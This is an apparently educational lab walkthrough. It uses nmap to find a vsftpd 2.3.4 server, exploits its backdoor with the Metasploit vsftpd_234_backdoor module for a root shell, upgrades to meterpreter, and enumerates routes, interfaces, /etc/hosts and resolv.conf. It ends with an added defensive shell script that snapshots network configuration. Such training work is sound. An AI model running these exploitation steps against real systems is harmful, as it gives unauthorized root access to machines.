Enumerating Linux Network Information

Solution

Step 1: Open the lab link to access the Kali terminal instance

Step 2: Identify the target IP address

To begin with, you will need to identify the target system's IP address. This can be done by
running the following command:

Command:

ifconfig

As shown in the following screenshot, locate the IP address associated with the eth1 interface. The
target IP address is the next IP within the subnet.

In this case the Kali Linux IP is 192.198.70.2 so the target IP will be 192.198.70.3.

Note: In your case the IP address will be different. Make sure you replace the IP address shown
here with the one from your lab environment.

Step 3: Port scanning with Nmap

Now that we have identified the target IP address, we can perform a port scan to identify
vulnerable services running on the target system. This can be done by running the following
command:

Command:

nmap -sV 192.198.70.3


The Nmap scan reveals that the target has an FTP server running on port 21. The version column
from the Nmap scan reveals that the FTP server is vsftpd 2.3.4. This version of vsftpd is
vulnerable to a backdoor command execution vulnerability and can be exploited with a
Metasploit module.

Step 4: Gaining access

Now that we have identified the vulnerable service running on the target, we can start the
Metasploit Framework console (msfconsole) by running the following command:

Command:

msfconsole

We can now load the appropriate exploit module by running the following command:

Command:

use exploit/unix/ftp/vsftpd_234_backdoor

We will now need to configure the module options, more specifically the target IP address. This
can be done by running the following command:

Command:

set RHOSTS 192.198.70.3

We can now run the module by running the following command:

Command:

exploit

As shown in the following screenshot, if the exploit runs successfully, we will be provided with a
command shell session with root privileges on the target system.

Because the command shell session is non-interactive, we will need to spawn a bash session. This
can be done by running the following command:

Command:

/bin/bash -i

You can also obtain a meterpreter session on the target system by upgrading the command shell
session. This can be done by running the following commands:

Command:

CTRL + Z

Command:

sessions -u 1

As shown in the preceding screenshot, upgrading the command shell to a meterpreter session is
successful and we can now interact with the target system via the meterpreter session with
a SESSION ID of 2.

Command:

sessions 2

Step 5: Enumerating network information

Now that we have gained access to the target system and have obtained a meterpreter session,
we can begin enumerating network information from the target system.

The first piece of information that we can enumerate is the list of network interfaces connected to
the target system and their respective IP addresses. This can be done by running the
following meterpreter command:

Command:

ifconfig

As shown in the following screenshot, the target system has one physical interface (eth0), a
loopback interface (lo) for local connections, and a virtual interface (ip_vti0).

We can get a list of open ports on the target system by running the
following meterpreter command:

Command:

netstat

Another important piece of information to obtain is the routing table. This can be done by running
the following command:

Command:

route

As shown in the preceding screenshot, this will give you an idea of all the routes available and
will also display the default gateway address.

This information can also be gathered manually by spawning a shell session and running the
following commands:

Command:

ip a s

As shown in the preceding screenshot, this command will display the list of network interfaces
connected to the target system.

We can also enumerate the list of configured networks and their subnets by running the
following command:

Command:

cat /etc/networks

Most importantly, we can enumerate the list of locally mapped domains and their respective IP
addresses by displaying the content of the /etc/hosts file.

Command:

cat /etc/hosts

As shown in the following screenshot, this file reveals that the victim-1 hostname is mapped to
the target IP address.

In order to identify the default DNS name server address, we can run the following command:

Command:

cat /etc/resolv.conf
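
The Step 5 data points (default gateway, /etc/hosts mappings, resolv.conf name servers) collected into one sorted snapshot that an administrator can diff against a known-good baseline to spot changed routes, resolvers or host mappings. This is an added example, not part of the original lab; the function names are hypothetical and the sample gateway and DNS addresses are constructed.

```shell
#!/bin/sh
# Added example: function names are hypothetical, sample data is constructed.

# Print "IP NAME" for every name in a hosts-format file; comments and blanks skipped.
hosts_map() {
    awk '{ sub(/#.*/, "") } NF >= 2 { for (i = 2; i <= NF; i++) print $1, $i }' "$1"
}

# Print each nameserver address from a resolv.conf-format file.
resolv_nameservers() {
    awk '{ sub(/[#;].*/, "") } $1 == "nameserver" && NF >= 2 { print $2 }' "$1"
}

# Read `ip route` output on stdin; print "GATEWAY DEV" per default route ("-" if absent).
default_gateway() {
    awk '$1 == "default" {
        gw = "-"; dev = "-"
        for (i = 2; i < NF; i++) {
            if ($i == "via") gw = $(i + 1)
            if ($i == "dev") dev = $(i + 1)
        }
        print gw, dev
    }'
}

# usage: ip route | net_snapshot /etc/hosts /etc/resolv.conf > snapshot.txt
# Output is sorted so two snapshots can be compared with diff.
net_snapshot() {
    {
        default_gateway | sed 's/^/gateway /'
        hosts_map "$1" | sed 's/^/host /'
        resolv_nameservers "$2" | sed 's/^/dns /'
    } | LC_ALL=C sort
}

# Offline demo on constructed inputs (gateway and DNS addresses are made up).
demo() {
    d=$(mktemp -d) || return 1
    printf '127.0.0.1 localhost\n192.198.70.3 victim-1 # lab target\n' > "$d/hosts"
    printf '# constructed\nnameserver 192.0.2.53\nsearch lab.example\n' > "$d/resolv.conf"
    printf 'default via 192.198.70.1 dev eth0\n192.198.70.0/24 dev eth0\n' |
        net_snapshot "$d/hosts" "$d/resolv.conf"
    rm -rf "$d"
}

demo
```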
